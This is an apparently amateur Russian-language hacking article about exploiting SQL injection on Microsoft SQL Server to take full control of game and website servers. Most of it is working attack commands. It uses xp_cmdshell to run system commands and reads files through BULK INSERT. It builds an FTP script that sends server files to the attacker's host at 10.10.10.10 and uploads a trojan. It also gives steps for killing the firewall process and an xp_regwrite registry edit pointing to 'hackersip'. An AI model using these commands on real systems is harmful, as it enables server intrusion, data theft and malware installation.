Статья о том, что можно выжать из найденной инъекции на сервере MSSQL.

Как известно, язык mssql поддерживает несколько команд в одном запросе. Они разделены через ; Настоящий подарок для хакера! В отличие от mysql есть возможность ввести любую команду в БД сервера.

В mssql есть куча хранимых системных процедур. Вот их краткий список -
xp_enumgroups (группы из ОС Windows)
xp_ntsec_enumdomains (список доменов сети)
xp_enumdsn (источники данных ODBC)
xp_loginconfig (инфо о пользователе)
xp_logininfo (все пользователи, залогинившиеся на данный момент в системе)
xp_msver (версия SQL сервера)
xp_cmdshell <команда> (исполнение файла через cmd.exe)
xp_servicecontrol <действие>,<служба> (запускает или останавливает указанные процесс)
xp_terminate_process <идентификатор процесса> (закрытие процесса по его ProcessID)
xp_startmail, xp_sendmail (обращение к потовому демону sendmail)
sp_makewebtask (выполнение команды html вида)

Нас будет интересовать в основном xp_cmdshell. Благодаря возможности вывода комманд в файл мы может увидеть результаты команды. Пример:
exec master.dbo.xp_cmdshell 'dir "c:/" >> c:/boot.dll'
Теперь в файле c:/boot.dll будет список директорий диска C.

Немного о чтении файлов:
CREATE TABLE temp_table (file2 char(5000) NOT NULL) - создаем таблицу куда будем читать.
truncate table temp_table - чистим эту таблицу
bulk insert temp_table from 'c:/boot.ini' - загружаем файл в таблицу
SELECT * FROM temp_table - выдаем на экран содержимое
Внимание: таким способом можно читать файлы только если есть возможность вывода информации на экран, в обратном случае смотрим ниже.

После окончания работы с таблицей не забудьте
DROP TABLE temp_table
иначе возникнут пробемы у хозяев сервера при бэкапах.

Очень часто возникает потребность в скачивании важных файлов с сервера (или наобот закачать троян на сервер).
Нетривиальная задача - ведь у нас есть только командная строка и мы даже не всегда можем посмотреть результаты выполнения команды.
Но команда ftp очень облегчает жизнь.
Допустим 10.10.10.10 - наш фтп сервер, 123 - пользователь, 123 - пароль пользователя 123.
Тогда выполнив группу команд
exec master.dbo.xp_cmdshell 'copy c:\windows\system32\cmd.exe c:\cmd1.exe' - делаем копию cmd чтобы можно было выполнять @echo

exec master.dbo.xp_cmdshell 'c:\cmd1.exe /c @echo open ftp.server.net > c:\ftp.ini'
exec master.dbo.xp_cmdshell 'c:\cmd1.exe /c @echo 123 ftp >> c:\ftp.ini'
exec master.dbo.xp_cmdshell 'c:\cmd1.exe /c @echo 123 ftp >> c:\ftp.ini'
exec master.dbo.xp_cmdshell 'c:\cmd1.exe /c @echo put c:\boot.ini >> c:\ftp.ini'
exec master.dbo.xp_cmdshell 'c:\cmd1.exe /c @echo bye >> c:\ftp.ini'
это мы создали файлег c:/ftp.ini с содержанием
open 10.10.10.10
123
123
put c:\boot.ini
bye

exec master.dbo.xp_cmdshell 'c:\cmd1.exe /c ftp -i -s:c:\ftp.ini' - грузим c:/boot.ini к себе на фтпшник.
Совет: потренируйтесь сначала на своем домашнем компьютере, убедитесь что все работает.

Разуемеется если на сайте есть сайт то можно сделать намного проще - copy c:/boot.ini c:/inetpub/wwwroot/123.ini и потом читать его из браузера как http://site.ru/123.ini
Однако во первых нужно знать установочную директорию сайта, а во вторых загрузить трояна таким способом у вас не получится.

Итак если вы вслепую делаете инъекцию (например union select... сделать не получилось или вы нашли инъекцию в какой-нибудь онлайт игре) вы все равно сможете узнать результаты выполнения комманд.
Просто вместо c:/boot.ini из предыдущего примера отправляйте к себе на фтп файл с результатами команд cmd.

Про блокирование фаервола:
Самый простой (но паленый) способ это поглядеть список процессов при помощи
exec master.dbo.xp_cmdshell 'tasklist >> c:/boot.dll', найти там процесс фаервола и убить его (к сожалению команды-аналога killl в unix не помню, поглядите в справочниках).
Также у нас есть полный доступ к системному реестру винды при помощи xp_regwrite.
Например разрешим mssql серверу соединяться по 80 порту:
exec xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServ er\Client\ConnectTo','Hacke
rSrvAlias','REG_SZ','DBMSSOCN,hackersip,80'

Итак в случае если сервер настроен по умолчанию (под администратором в виндовсе и под sa в mssql), если нету ограничения на длину запроса и нету фильтрации спецсимволов мы можем захватить полный контроль над сервером.
Могу сказать, что такие настройки встречаются очень часто. Таким образом, найдя инъекцию в игре или на сайте, можно скачать важную информацию с сервера или захватить над ним полный контроль.

Моя первая статья, не судите строго. Писал по своему опыту, пришлось долго искать необходимую информацию. Может быть поможет кому-нибудь.

Ссылки по теме:

_http://www.marketer.ru/node/795/
_http://fenix.lamak.ru/Journal/XAKEP/2003/(8)56/050/2.htm

Про отключение стандартного фаервола из командной строки windows где-то видел тему, но потерял ссылку (